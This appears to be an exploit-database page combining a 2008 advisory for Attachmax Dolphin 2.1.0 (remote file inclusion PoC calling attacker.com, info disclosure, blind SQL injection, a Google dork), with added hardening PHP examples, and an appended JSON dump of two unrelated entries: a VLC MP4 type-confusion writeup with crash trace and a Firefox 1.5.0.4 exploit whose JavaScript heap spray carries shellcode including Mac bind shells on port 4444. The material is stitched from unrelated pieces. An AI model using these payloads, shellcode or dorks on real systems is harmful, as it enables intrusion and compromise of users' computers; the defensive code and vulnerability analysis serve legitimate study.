ID 1337DAY-ID-3677 Type zdt Reporter K-159 Modified 2008-09-16T00:00:00
Description
Exploit for unknown platform in category web applications
==========================================================
Attachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities
==========================================================
-----------------------------------------------------------------------------------------
[ECHO_ADV_101$2008] Attachmax Dolphin <= 2.1.0 Multiple Vulnerabilities
-----------------------------------------------------------------------------------------
Author : K-159
Date : September 16th, 2008
Location : Jakarta, Indonesia
Critical Lvl : High
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Attachmax Dolphin
Version : <= 2.1.0
Vendor : http://www.attachmax.com/
Description :
Attachmax allows you to run your very own YouTube-style video community site, just like popular video sites
such as YouTube, Dailymotion and Revver. Additionally, Attachmax includes support for images and files,
following the trend of other popular file sharing communities such as ImageShack and Rapidshare.
So not only do you get a fully functional video script, but a complete file sharing website.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
1. Remote File Inclusion Vulnerability
Input passed to the "rel_path" parameter of config.php is not properly verified before being used
to include files. This can be exploited to include arbitrary files from local or external resources.
Successful exploitation requires that "register_globals" is enabled, since that is what turns the
request parameter into the $rel_path variable the script includes from.
Poc/Exploit:
~~~~~~~~~
http://www.example.com/[path]/config.php?rel_path=http://www.attacker.com/evil?
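The following is an added illustration written for this page; it is not Attachmax's code (the advisory does not reproduce config.php), so the "before" pattern in the header comment is a reconstruction of the defect described above, and the directory layout, module names and the resolve_include() helper are assumptions. It shows why register_globals is the precondition, the php.ini settings that remove it, and a hardened way to turn a request value into an include path that can never point at a URL or outside the application directory.

```php
<?php
declare(strict_types=1);

/*
 * BEFORE (reconstructed vulnerable pattern, not the vendor's actual source):
 *
 *     // with register_globals=On, ?rel_path=... silently becomes $rel_path
 *     include($rel_path . 'lib/functions.php');
 *
 * php.ini settings that remove the precondition and the remote half of the issue:
 *
 *     register_globals  = Off
 *     allow_url_include = Off
 */

/**
 * Resolve a module name to a file inside $baseDir, or return null.
 * Only plain identifiers are accepted, so URLs, null bytes, "../" traversal
 * and absolute paths are rejected before anything reaches include().
 */
function resolve_include(string $baseDir, string $module): ?string
{
    // Allow-list the shape of the value: letters, digits, underscore only.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $module)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $module . '.php');
    // realpath() canonicalises symlinks and "..", so a prefix check on the
    // canonical path is a reliable containment test.
    if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo: a throwaway include directory with one module (assumed layout).
$dir = sys_get_temp_dir() . '/dolphin_demo_' . getmypid();
mkdir($dir . '/lib', 0700, true);
file_put_contents($dir . '/lib/functions.php',
    "<?php\nfunction demo_ok() { return 'functions.php loaded'; }\n");

// Constructed inputs: one legitimate module name and three hostile values.
$samples = [
    'functions',                        // legitimate module
    'http://www.attacker.com/evil?',    // the advisory's PoC value
    '../../../etc/passwd',              // local traversal attempt
    "functions\0",                      // null-byte truncation attempt
];
foreach ($samples as $input) {
    $path = resolve_include($dir . '/lib', $input);
    printf("%-36s => %s\n", json_encode($input),
        $path === null ? 'REJECTED' : 'include ' . basename($path));
}

// Only a resolved path is ever handed to require; the raw request value never is.
$path = resolve_include($dir . '/lib', 'functions');
if ($path !== null) {
    require_once $path;
    echo demo_ok(), "\n";
}

// Clean up the demo directory.
unlink($dir . '/lib/functions.php');
rmdir($dir . '/lib');
rmdir($dir);
```

Run it with `php resolve_include_demo.php`: only `functions` resolves, the other three inputs print REJECTED. The identifier allow-list does the real work; the realpath() prefix check is a second layer in case the allow-list is later loosened to permit subdirectories.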
2. File info disclosure Vulnerability
The file info.php in the main folder is not protected from direct access through the browser and could allow
an attacker to obtain sensitive information about the server.
Poc:
~~~
http://www.example.com/[path]/info.php
3. Blind SQL Injection Vulnerability.
Input passed to the "category" parameter of search.php is not properly verified before being used
in an SQL query.
This can be exploited through the browser to manipulate SQL queries and extract user names and passwords
in plain text.
Poc/Exploit:
~~~~~~~~~~~
http://www.example.com/[path]/index.php?page=Search&category=[BlindSQL]
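As an added example for this page (not Attachmax's search.php, which the advisory does not reproduce), the script below stands the concatenation pattern the advisory describes next to a prepared-statement version and an allow-list check, and runs both against a constructed in-memory SQLite table. The table name, columns and category values are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed in-memory schema standing in for the application's file table.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE files (id INTEGER PRIMARY KEY, title TEXT, category TEXT)");
$db->exec("INSERT INTO files (title, category) VALUES
           ('cat.mp4', 'video'), ('beach.jpg', 'image'), ('notes.zip', 'file')");

/**
 * BEFORE: the pattern the advisory describes. The request value is spliced
 * into the SQL text, so the input can change the query's meaning.
 */
function search_vulnerable(PDO $db, string $category): array
{
    $sql = "SELECT title FROM files WHERE category = '" . $category . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

/**
 * AFTER: a prepared statement keeps the query text fixed; the value is bound
 * separately and can only ever be compared as a category string.
 */
function search_safe(PDO $db, string $category): array
{
    $stmt = $db->prepare("SELECT title FROM files WHERE category = :category");
    $stmt->execute([':category' => $category]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

/** Optional second layer when the set of valid categories is fixed (assumed set). */
function category_allowed(string $category): bool
{
    return in_array($category, ['video', 'image', 'file'], true);
}

// Constructed inputs: one ordinary request and one textbook tautology.
$inputs = [
    'video',
    "' OR '1'='1",
];
foreach ($inputs as $in) {
    printf("%-16s concatenated => %s\n", json_encode($in), json_encode(search_vulnerable($db, $in)));
    printf("%-16s prepared     => %s\n", json_encode($in), json_encode(search_safe($db, $in)));
    printf("%-16s allow-list   => %s\n", json_encode($in), category_allowed($in) ? 'accepted' : 'rejected');
}
```

For the ordinary input both functions return `["cat.mp4"]`. For the tautology the concatenated query returns every row because the WHERE clause has been rewritten, while the prepared statement returns an empty list because no category literally equals that string, and the allow-list rejects it before any query runs. Binding is the fix; the allow-list only narrows the accepted values further.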
Dork:
~~~~
Google : "2007 Attachmax" or inurl:"controller.php?page=profile"
Solution:
~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn off register_globals in php.ini.
- Rename info.php.
Timeline:
~~~~~~~~
- 24-08-2008: bug found
- 02-09-2008: vendor contacted
- 16-09-2008: advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ "Happy 5th Anniversary" for ECHO.
~ ping - my dearest wife, zautha - my beloved son, and my beloved next children.
~ "Happy Wedding" for (y3dips,the_day,Negatif),moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ SK,pokleyzz,Abond,an0maly,cybertank, super_temon, b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
# 0day.today [2018-04-14] #
{"result": {"zdt": [{"lastseen": "2018-04-08T23:43:06", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "Hans Jerry Illikainen", "published": "2017-12-17T00:00:00", "title": "VLC 2.2.8 MP4 Demux Type Conversion Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-08T23:43:06", "vector": "AV:N/AC:L/Au:M/C:P/I:N/A:P/", "value": 4.7}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17670"], "modified": "2017-12-17T00:00:00", "id": "1337DAY-ID-29240", "href": "https://0day.today/exploit/description/29240", "sourceData": "About\r\n=====\r\n\r\nA type conversion vulnerability exist in the MP4 demux module in VLC\r\n<=2.2.8. This issue has been assigned CVE-2017-17670 and it could be\r\nused to cause an arbitrary free.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nMP4 is a container format for video, audio, subtitles and images. The\r\nvarious parts of an .mp4 are organized as hierarchical boxes/atoms in\r\nbig-endian byte ordering [1].\r\n\r\nVLC processes these boxes by using a lookup table:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3297 static const struct\r\n| 3298 {\r\n| 3299 uint32_t i_type;\r\n| 3300 int (*MP4_ReadBox_function )( stream_t *p_stream, MP4_Box_t *p_box );\r\n| 3301 void (*MP4_FreeBox_function )( MP4_Box_t *p_box );\r\n| 3302 uint32_t i_parent; /* set parent to restrict, duplicating if needed; 0 for any */\r\n| 3303 } MP4_Box_Function [] =\r\n| 3304 {\r\n| 3305 /* Containers */\r\n| 3306 { ATOM_moov, MP4_ReadBoxContainer, MP4_FreeBox_Common, 0 },\r\n| 3307 { ATOM_trak, MP4_ReadBoxContainer, MP4_FreeBox_Common, ATOM_moov },\r\n| ....\r\n| 3565 /* Last entry */\r\n| 3566 { 0, MP4_ReadBox_default, NULL, 0 }\r\n| 3567 };\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3574 static MP4_Box_t *MP4_ReadBox( stream_t *p_stream, MP4_Box_t *p_father )\r\n| 3575 {\r\n| 3576 MP4_Box_t *p_box = calloc( 1, sizeof( MP4_Box_t ) ); /* Needed to ensure 
simple on error handler */\r\n| 3577 unsigned int i_index;\r\n| ....\r\n| 3582 if( !MP4_ReadBoxCommon( p_stream, p_box ) )\r\n| 3583 {\r\n| ....\r\n| 3587 }\r\n| ....\r\n| 3605 /* Now search function to call */\r\n| 3606 for( i_index = 0; ; i_index++ )\r\n| 3607 {\r\n| ....\r\n| 3613 if( ( MP4_Box_Function[i_index].i_type == p_box->i_type )||\r\n| 3614 ( MP4_Box_Function[i_index].i_type == 0 ) )\r\n| 3615 {\r\n| 3616 break;\r\n| 3617 }\r\n| 3618 }\r\n| 3619\r\n| 3620 if( !(MP4_Box_Function[i_index].MP4_ReadBox_function)( p_stream, p_box ) )\r\n| 3621 {\r\n| 3622 MP4_BoxFree( p_stream, p_box );\r\n| 3623 return NULL;\r\n| 3624 }\r\n| 3625\r\n| 3626 return p_box;\r\n| 3627 }\r\n`----\r\n\r\n\r\nMP4_ReadBox() allocates a MP4_Box_t structure and invokes\r\nMP4_ReadBoxCommon() to read the properties common to all mp4 boxes;\r\n`i_size' and `i_type' (and optionally an extended size). Afterwards,\r\nMP4_Box_Function is used to dispatch further parsing to a suitable\r\nfunction based on its `i_type'.\r\n\r\nWhen VLC is done with the boxes, they are freed with MP4_BoxFree():\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 3633 void MP4_BoxFree( stream_t *s, MP4_Box_t *p_box )\r\n| 3634 {\r\n| 3635 unsigned int i_index;\r\n| ....\r\n| 3650 /* Now search function to call */\r\n| 3651 if( p_box->data.p_payload )\r\n| 3652 {\r\n| 3653 for( i_index = 0; ; i_index++ )\r\n| 3654 {\r\n| ....\r\n| 3660 if( ( MP4_Box_Function[i_index].i_type == p_box->i_type )||\r\n| 3661 ( MP4_Box_Function[i_index].i_type == 0 ) )\r\n| 3662 {\r\n| 3663 break;\r\n| 3664 }\r\n| 3665 }\r\n| 3666 if( MP4_Box_Function[i_index].MP4_FreeBox_function == NULL )\r\n| 3667 {\r\n| ....\r\n| 3677 }\r\n| 3678 else\r\n| 3679 {\r\n| 3680 MP4_Box_Function[i_index].MP4_FreeBox_function( p_box );\r\n| 3681 }\r\n| ....\r\n| 3685 }\r\n`----\r\n\r\nAgain, `i_type' is used to find a suitable free-function.\r\n\r\nThe reason this may be problematic is that `i_type' could be changed\r\nwhen VLC handles `sinf' and 
`frma' boxes in TrackCreateES() -- meaning\r\nthat a box may be read as one type, and freed as another.\r\n\r\n`sinf' is the \"Protection Scheme Information Box\" and it's used for\r\nprotected/encrypted media. `frma' is the \"Original Format Box\" and it's\r\nused to declare the format of the unprotected media.\r\n\r\nIf a sinf/frma is found underneath a sample box, the `i_type' of that\r\nsample is replaced with the original format declared in the `frma':\r\n\r\nvlc-2.2.8/modules/demux/mp4/mp4.c\r\n,----\r\n| 2180 static int TrackCreateES( demux_t *p_demux, mp4_track_t *p_track,\r\n| 2181 unsigned int i_chunk, es_out_id_t **pp_es )\r\n| 2182 {\r\n| ....\r\n| 2208 p_sample = MP4_BoxGet( p_track->p_stsd, \"[%d]\",\r\n| 2209 i_sample_description_index - 1 );\r\n| ....\r\n| 2219 p_track->p_sample = p_sample;\r\n| 2220\r\n| 2221 if( ( p_frma = MP4_BoxGet( p_track->p_sample, \"sinf/frma\" ) ) && p_frma->data.p_frma )\r\n| 2222 {\r\n| 2223 msg_Warn( p_demux, \"Original Format Box: %4.4s\", (char *)&p_frma->data.p_frma->i_type );\r\n| 2224\r\n| 2225 p_sample->i_type = p_frma->data.p_frma->i_type;\r\n| 2226 }\r\n| ....\r\n`----\r\n\r\nNo sanity check is done to make sure that the MP4_FreeBox_function\r\nassociated with the new `i_type' is compatible with the old\r\nMP4_ReadBox_function.\r\n\r\n\r\nExample\r\n=======\r\n\r\nOne way to abuse the type change is to have a `soun' changed to a\r\n`vide'. 
This results in a 72-byte allocation (x86-64) for the\r\n`p_sample_soun' member of the p_box->data union when the box is read:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 1614 static int MP4_ReadBox_sample_soun( stream_t *p_stream, MP4_Box_t *p_box )\r\n| 1615 {\r\n| 1616 p_box->i_handler = ATOM_soun;\r\n| 1617 MP4_READBOX_ENTER( MP4_Box_data_sample_soun_t );\r\n| ....\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1351 #define MP4_READBOX_ENTER( MP4_Box_data_TYPE_t ) \\\r\n| ....\r\n| 1369 if( !( p_box->data.p_payload = calloc( 1, sizeof( MP4_Box_data_TYPE_t ) ) ) ) \\\r\n| 1370 { \\\r\n| ....\r\n| 1373 }\r\n`----\r\n\r\nwhere `p_box' is MP4_Box_t:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1284 typedef struct MP4_Box_s\r\n| 1285 {\r\n| ....\r\n| 1296 MP4_Box_data_t data; /* union of pointers on extended data depending\r\n| 1297 on i_type (or i_usertype) */\r\n| ....\r\n| 1306 } MP4_Box_t;\r\n`----\r\n\r\nand MP4_Box_data_t:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 1200 typedef union MP4_Box_data_s\r\n| 1201 {\r\n| ....\r\n| 1220 MP4_Box_data_sample_vide_t *p_sample_vide;\r\n| 1221 MP4_Box_data_sample_soun_t *p_sample_soun;\r\n| ....\r\n| 1278 void *p_payload; /* for unknow type */\r\n| 1279 } MP4_Box_data_t;\r\n`----\r\n\r\n,----\r\n| (gdb) p sizeof(MP4_Box_data_sample_soun_t)\r\n| $1 = 72\r\n`----\r\n\r\nAfter the box has had its type changed to `vide' and it's later freed,\r\nthe `p_sample_vide' member of the p_box->data union is used:\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.c\r\n,----\r\n| 1861 void MP4_FreeBox_sample_vide( MP4_Box_t *p_box )\r\n| 1862 {\r\n| 1863 FREENULL( p_box->data.p_sample_vide->p_qt_image_description );\r\n| 1864 }\r\n`----\r\n\r\n,----\r\n| (gdb) p sizeof(MP4_Box_data_sample_vide_t)\r\n| $2 = 96\r\n| (gdb)\r\n`----\r\n\r\nvlc-2.2.8/modules/demux/mp4/libmp4.h\r\n,----\r\n| 529 typedef struct MP4_Box_data_sample_vide_s\r\n| 530 {\r\n| ...\r\n| 557 uint8_t 
*p_qt_image_description;\r\n| 558\r\n| 559 } MP4_Box_data_sample_vide_t;\r\n`----\r\n\r\n`p_sample_vide' is 24 bytes larger than `p_sample_soun', and\r\n`p_qt_image_description' is at the end of the vide struct; i.e. the\r\npointer to be free()d is read out-of-bounds from potentially\r\nuser-controlled memory.\r\n\r\n`mkmp4.py' at [2]\r\n\r\n,----\r\n| $ uname -imrs\r\n| FreeBSD 11.1-RELEASE-p4 amd64 GENERIC\r\n| $ ./mkmp4.py file.mp4\r\n| $ vlc --version\r\n| VLC media player 2.2.8 Weatherwax (revision 2.2.7-14-g3cc1d8cba9)\r\n| $ gdb -q --args vlc file.mp4\r\n| (gdb) set breakpoint pending on\r\n| (gdb) b libmp4.c:1618\r\n| No source file named libmp4.c.\r\n| Breakpoint 1 (libmp4.c:1618) pending.\r\n| (gdb) b libmp4.c:1863\r\n| No source file named libmp4.c.\r\n| Breakpoint 2 (libmp4.c:1863) pending.\r\n| (gdb) r\r\n| [...]\r\n| Breakpoint 3, MP4_ReadBox_sample_soun (p_stream=0x802ab2710, p_box=0x802a85000) at demux/mp4/libmp4.c:1618\r\n| 1618 p_box->data.p_sample_soun->p_qt_description = NULL;\r\n| (gdb) p p_box->data.p_sample_soun\r\n| $1 = (MP4_Box_data_sample_soun_t *) 0x802a79810\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Breakpoint 4, MP4_FreeBox_sample_vide (p_box=0x802a85000) at demux/mp4/libmp4.c:1863\r\n| 1863 FREENULL( p_box->data.p_sample_vide->p_qt_image_description );\r\n| (gdb) p p_box->data.p_sample_vide\r\n| $2 = (MP4_Box_data_sample_vide_t *) 0x802a79810\r\n| (gdb) p p_box->data.p_sample_vide->p_qt_image_description\r\n| $3 = (uint8_t *) 0x1122334455667788 <Error reading address 0x1122334455667788: Bad address>\r\n| (gdb) b free\r\n| Breakpoint 5 at 0x8019d3ce4\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Breakpoint 5, 0x00000008019d3ce4 in free () from /lib/libc.so.7\r\n| (gdb) p/x $rdi\r\n| $4 = 0x1122334455667788\r\n| (gdb) c\r\n| Continuing.\r\n|\r\n| Program received signal SIGBUS, Bus error.\r\n| 0x00000008019d36f3 in realloc () from /lib/libc.so.7\r\n| (gdb) x/i $rip\r\n| 0x8019d36f3 <realloc+3939>: mov rbx,QWORD PTR [rax+rcx*8+0x68]\r\n| (gdb) i 
r\r\n| rax 0x1122334455600000 1234605616436084736\r\n| rbx 0x1122334455667788 1234605616436508552\r\n| rcx 0x5a 90\r\n| [...]\r\n| (gdb) bt 4\r\n| #0 0x00000008019d36f3 in realloc () from /lib/libc.so.7\r\n| #1 0x00000008019d3d51 in free () from /lib/libc.so.7\r\n| #2 0x0000000806d7fafd in MP4_FreeBox_sample_vide (p_box=0x802a85000) at demux/mp4/libmp4.c:1863\r\n| #3 0x0000000806d7fcfd in MP4_BoxFree (s=0x802ab2710, p_box=0x802a85000) at demux/mp4/libmp4.c:3680\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nThis issue does not affect the HEAD of the VLC master branch.\r\n\r\n\r\n\r\nFootnotes\r\n_________\r\n\r\n[1] [http://xhelmboyx.tripod.com/formats/mp4-layout.txt]\r\n\r\n[2] [https://gist.github.com/dyntopia/194d912287656f66dd502158b0cd2e68]\r\n\r\n\r\n-- \r\nhji\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29240"}, {"lastseen": "2018-02-07T01:24:26", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "H D Moore", "published": "2006-07-28T00:00:00", "title": "Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC ", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-07T01:24:26", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/", "value": 3.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-07-28T00:00:00", "id": "1337DAY-ID-8733", "href": "https://0day.today/exploit/description/8733", "sourceData": "=========================================================================\r\nMozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC\r\n=========================================================================\r\n\r\n<!--\r\nFirefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC \r\nhttp://browserfun.blogspot.com/\r\n\r\nThe following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running \r\non 
Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. \r\nThis bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of \r\nMozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is \r\ntrivial to turn into a working exploit. The demonstration link below will attempt \r\nto launch \"calc.exe\" on Windows systems and \"touch /tmp/METASPLOIT\" on Linux systems.\r\n\r\nwindow.navigator = (0x01020304 / 2);\r\njava.lang.reflect.Runtime.newInstance( java.lang.Class.forName(\"java.lang.Runtime\"), 0);\r\n\r\n-->\r\n\r\n<html><body><script>\r\n\r\n// MoBB Demonstration\r\nfunction Demo() {\r\n\r\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\r\n\t// CVE-2006-3677\r\n\r\n\t// The Java plugin is required for this to work\r\n\r\n\t// win32 = calc.exe\r\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\r\n\tvar fill_win32 = unescape('%u0800');\r\n\tvar addr_win32 = 0x08000800;\r\n\t\r\n\t// linux = touch /tmp/METASPLOIT (unreliable)\r\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\r\n\tvar fill_linux = unescape('%ua8a8');\r\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\r\n\r\n\t// mac os x ppc = bind a shell to 4444\r\n\tvar shellcode_macppc = 
unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');\r\n\tvar fill_macppc = unescape('%u0c0c');\r\n\tvar addr_macppc = 0x0c000000;\r\n\t\r\n\t// mac os x intel = bind a shell to 4444\r\n\t// Thanks to nemo[at]felinemenace.org for shellcode\r\n\t// Thanks to Todd Manning for the target information and testing\r\n\tvar shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');\r\n\tvar fill_macx86 = unescape('%u1c1c');\r\n\tvar addr_macx86 = 0x1c000000;\t\t\r\n\r\n\r\n\t// Start the browser detection\r\n\tvar shellcode;\r\n\tvar addr;\r\n\tvar fill;\r\n\tvar ua = '' + navigator.userAgent;\r\n\r\n\tif (ua.indexOf('Linux') != -1) {\r\n\t\talert('Trying to create /tmp/METASPLOIT');\r\n\t\tshellcode = shellcode_linux;\r\n\t\taddr = addr_linux;\r\n\t\tfill = fill_linux;\r\n\t}\r\n\t\r\n\tif (ua.indexOf('Windows') != -1) {\r\n\t\talert('Trying to launch Calculator');\t\r\n\t\tshellcode = shellcode_win32;\r\n\t\taddr = addr_win32;\r\n\t\tfill = fill_win32;\r\n\t}\t\r\n\r\n\tif (ua.indexOf('PPC Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macppc;\r\n\t\taddr = 
addr_macppc;\r\n\t\tfill = fill_macppc;\r\n\t}\t\r\n\t\r\n\tif (ua.indexOf('Intel Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macx86;\r\n\t\taddr = addr_macx86;\r\n\t\tfill = fill_macx86;\r\n\t}\r\n\t\t\t\r\n\tif (! shellcode) {\r\n\t\talert('OS not supported, only attempting a crash!');\r\n\t\tshellcode = unescape('%ucccc');\r\n\t\tfill = unescape('%ucccc');\r\n\t\taddr = 0x02020202;\r\n\t}\r\n\t\t\r\n\tvar b = fill;\r\n\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\tvar c = new Array();\r\n\tfor (var i =0; i<36; i++) {\r\n\t\tc[i] = \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t}\r\n\t\t\t\r\n\t\r\n\tif (window.navigator.javaEnabled) {\r\n\t\twindow.navigator = (addr / 2);\r\n\t\ttry {\r\n\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\tjava.lang.Class.forName(\"java.lang.Runtime\"), 0\r\n\t\t\t);\r\n\t\t\talert('Patched!');\r\n\t\t}catch(e){\r\n\t\t\talert('No Java plugin installed!');\r\n\t\t}\r\n\t}\r\n}\r\n\r\n</script>\r\n\r\nClicking the button below may crash your browser!<br><br>\r\n<input type='button' onClick='Demo()' value='Start Demo!'>\r\n\r\n\r\n</body></html>\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8733"}]}}